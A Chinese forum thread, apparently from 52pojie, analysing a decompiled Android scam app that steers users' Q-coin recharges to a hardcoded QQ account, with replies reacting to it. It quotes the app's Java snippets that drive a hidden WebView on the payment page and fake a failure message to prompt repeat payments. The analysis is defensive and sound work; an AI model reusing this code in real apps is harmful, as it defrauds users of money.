【简单分析】一款骗QB的简单软件分析

Jermic

今天刚看到的一个帖子http://www.52pojie.cn/thread-249298-1-1.html
没事干下来看看！
能看到关于这个充值骗子的信息也就是这个

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18

this.WebView2.loadUrl("http://pay.qq.com/h5/index.shtml?&sid=AWLeiSNwBVHIAQI5-48dzNhg&u=2969571156");     showDownloadDialog();     this.mDownloadDialog.dismiss();     this.WebView3 = ((WebView)findViewById(2131230753));     this.WebView3.getSettings().setDefaultTextEncodingName("utf-8");     this.WebView3.addJavascriptInterface(new WebAppInterface(this), "myInterfaceName");     this.WebView3.setVisibility(4);     this.WebView3.getSettings().setJavaScriptEnabled(true);     this.WebView3.setWebChromeClient(new WebChromeClient()     {       public void onProgressChanged(WebView paramAnonymousWebView, int paramAnonymousInt)       {         MainActivity.this.activity.setProgress(paramAnonymousInt * 100);         if (paramAnonymousInt == 100) {           MainActivity.this.activity.setTitle(2131034112);         }       }     });

LZ说找到了QQ号，其实这样就是需要一个QQ号，不需要什么密码  通过QQ他人支付的一个页面，让用户把自己要充值的QB充值到这个人的QQ号上面

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

public void showToast(String paramString)     {       MainActivity.date = paramString.toString();       if (paramString.indexOf("充值成功") > -1)       {         WebView localWebView14 = (WebView)MainActivity.this.findViewById(2131230726);         Runnable local1 = new Runnable()         {           private void Success()           {             System.exit(0);             int i = 1 + Integer.parseInt(MainActivity.szhi);             int j = Integer.parseInt(MainActivity.sqty) + Integer.parseInt(MainActivity.ydkj);             MainActivity.this.WebView3.loadUrl("javascript:document.getElementById('h2').value= '" + i + "'");             MainActivity.this.WebView3.loadUrl("javascript:document.getElementById('h3').value='" + j + "'");             MainActivity.this.WebView3.loadUrl("javascript:document.getElementById('button').click()");             MainActivity.this.showDialog("系统检测到你非法充Q币\n系统将清空你非法所得！");           }                       public void run()           {             MainActivity.this.handler.removeCallbacks(MainActivity.this.task);             MainActivity.this.handler2.removeCallbacks(MainActivity.this.task2);             System.exit(0);             Success();           }         };         localWebView14.post(local1);       }       if (paramString.indexOf("mysql") > -1)       {         WebView localWebView13 = (WebView)MainActivity.this.findViewById(2131230726);         Runnable local2 = new Runnable()         {           public void run()           {             Matcher localMatcher = Pattern.compile("(\\d+)#(\\d+):(\\d+):(.+?):").matcher(MainActivity.date);             if (localMatcher.find())             {               MainActivity.sqqh = localMatcher.group(1).toString().trim();               MainActivity.szhi = localMatcher.group(2).toString().trim();               MainActivity.sqty = localMatcher.group(3).toString().trim();               MainActivity.sdate = localMatcher.group(4).toString().trim();               if (MainActivity.sqqh.length() < 4) {                 MainActivity.sqqh = null;               }             }           }         };         localWebView13.post(local2);       }

这个地方还有个提示，就是充值其实成功了，然后假冒提示充值失败，对于没有经验的用户来说，就可能再一次两次三次的尝试这个软件，作者就获取更多的QB

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

if (paramString.indexOf("mbb") > -1) {   WebView localWebView6 = (WebView)MainActivity.this.findViewById(2131230726);   Runnable local9 = new Runnable()   {     public void run()     {       MainActivity.this.pag1();       MainActivity.this.WebView1.loadUrl("file:///android_asset/pag1.html");     }   };   localWebView6.post(local9); } if (paramString.indexOf("qty") > -1) {   WebView localWebView5 = (WebView)MainActivity.this.findViewById(2131230726);   Runnable local10 = new Runnable()   {     public void run()     {       Matcher localMatcher = Pattern.compile("(\\d+)").matcher(MainActivity.date);       if (localMatcher.find())       {         MainActivity.ydkj = localMatcher.group(1).toString().toString();         MainActivity.this.pag2(localMatcher.group(1).toString());       }       MainActivity.this.WebView1.loadUrl("file:///android_asset/pag2.html");     }   };

里面还有一些类似这中代码，不太清楚是干嘛的，感觉像是伪造充值页面什么的吧



没有安装尝试这个软件，只是大概的看了一下代码 然后猜想的，，如果有不对的欢迎大家指出并补充，新人求不喷！给点热心 还是不错的～

宿命棋局

看不懂的路过，小白一只，学习中

shabi1hao

谢谢lZ分享

yancie

看不懂小白路过，努力学习

Sp4ce

不排除以后的变种用邮箱等方式将卡号和密码发送到指定邮箱
而且我用平板电脑安装了一下，随意输了点号竟然提示翻倍成功，卧槽，作者这牲口

优雅二进制

多谢楼主的分析，向你学习了

yangao282479264

作者这牲口太可恶了 我能喷他么？

kamasutra

小白一只，膜拜大神路过。